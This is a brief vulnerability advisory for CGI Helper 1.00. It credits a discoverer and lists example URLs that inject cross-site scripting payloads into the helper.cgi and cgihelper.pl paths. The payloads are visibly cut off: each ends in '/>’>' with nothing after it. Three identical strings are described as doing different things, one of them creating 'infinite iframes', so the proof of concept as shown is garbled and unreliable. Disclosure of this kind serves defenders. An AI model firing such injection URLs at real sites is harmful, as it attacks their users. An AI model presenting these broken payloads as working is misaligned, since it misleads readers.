## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
## Discovered by: Paulo Santos ##
## Contact: paulo@infocampoap.com.br ##
## Blog: http://infocampo.wordpress.com ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>’>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>’>
The script makes infinite iframes that can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>’>